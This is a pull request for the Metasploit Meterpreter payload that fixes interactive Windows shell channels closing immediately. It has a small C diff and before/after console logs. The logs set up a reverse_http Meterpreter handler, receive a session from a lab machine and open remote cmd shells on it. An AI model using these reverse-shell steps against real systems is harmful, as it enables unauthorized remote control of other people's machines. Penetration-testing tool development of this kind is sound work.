### PR TITLE
Fix the immediate closing of a interactive channel.

### DIFF
--- a/c/meterpreter/source/extensions/stdapi/server/sys/process/process.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/process.c
@@ -1168,6 +1168,7 @@ DWORD process_channel_interact_notify(Remote *remote, LPVOID entryContext, LPVOI
 			{
 				return channel_write( channel, remote, NULL, 0, buffer, bytesRead, NULL );
 			}
+			result = GetLastError();
 		}
 		else
 		{
@@ -1175,6 +1176,10 @@ DWORD process_channel_interact_notify(Remote *remote, LPVOID entryContext, LPVOI
 			// in this thread, as anonymous pipes won't block for data to arrive.
 			Sleep( 100 );
 		}
+	}
+	else
+	{
+		result = GetLastError();
 	}
 #else
 	bytesRead = read ( ctx->pStdout, buffer, sizeof(buffer) - 1);
@@ -1200,9 +1205,9 @@ DWORD process_channel_interact_notify(Remote *remote, LPVOID entryContext, LPVOI
 	if(bytesRead <= 0) result = errno;
 
 #endif
-	if( GetLastError() != ERROR_SUCCESS )
+	if( result != ERROR_SUCCESS )
 	{
-		dprintf("Closing down socket: errno: %d\n", errno);
+		dprintf("Closing down socket: result: %d\n", result);
 		process_channel_close( channel, NULL, ctx );
 		channel_close( channel, remote, NULL, 0, NULL );
 	}


### PR DESCRIPTION
This PR fixes the behavior that the channel is immediately closed when starting a shell in a Meterpreter session on Windows.The problem is that a Meterpreter process checks the LastError value even though the named pipe was read successfully.The process should check the LastError value only when the named pipe read fails. 

## Verification

- [ ] start `msfconsole`
- [ ] Create a Meterpreter session
- [ ] Enter the Meterpreter session
- [ ] run `shell` or `execute -f cmd -i -H`

### Before
~~~
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 192.168.56.82
LHOST => 192.168.56.82
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTP reverse handler on http://192.168.56.82:8080
[*] Starting the payload handler...
msf exploit(handler) > [*] http://192.168.56.82:8080 handling request from 192.168.56.126; (UUID: ca1krzqv) Staging Native payload...
[*] Meterpreter session 1 opened (192.168.56.82:8080 -> 192.168.56.126:49700) at 2016-06-15 13:53:04 +0900

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-E1CQ2QK\user
meterpreter > sysinfo
Computer        : DESKTOP-E1CQ2QK
OS              : Windows 10 (Build 10586).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > shell
Process 2812 created.
Channel 1 created.
meterpreter > shell
Process 1608 created.
Channel 2 created.
meterpreter > execute -f cmd -i -H
Process 3168 created.
Channel 3 created.
meterpreter > execute -f cmd -i -H
Process 1664 created.
Channel 4 created.
meterpreter > 
~~~

### After
~~~
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 192.168.56.82
LHOST => 192.168.56.82
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTP reverse handler on http://192.168.56.82:8080
[*] Starting the payload handler...
msf exploit(handler) > [*] http://192.168.56.82:8080 handling request from 192.168.56.126; (UUID: hkexsmlm) Staging Native payload...
[*] Meterpreter session 1 opened (192.168.56.82:8080 -> 192.168.56.126:49702) at 2016-06-15 14:20:24 +0900

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-E1CQ2QK\user
meterpreter > sysinfo
Computer        : DESKTOP-E1CQ2QK
OS              : Windows 10 (Build 10586).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > shell
Process 904 created.
Channel 1 created.
Microsoft Windows [Version 10.0.10586]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>exit
exit
meterpreter > shell
Process 2400 created.
Channel 2 created.
Microsoft Windows [Version 10.0.10586]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>exit
exit
meterpreter > execute -f cmd.exe -i -H
Process 756 created.
Channel 3 created.
Microsoft Windows [Version 10.0.10586]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>exit
exit
meterpreter > execute -f cmd.exe -i -H
Process 1472 created.
Channel 4 created.
Microsoft Windows [Version 10.0.10586]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>exit
exit
meterpreter > 
~~~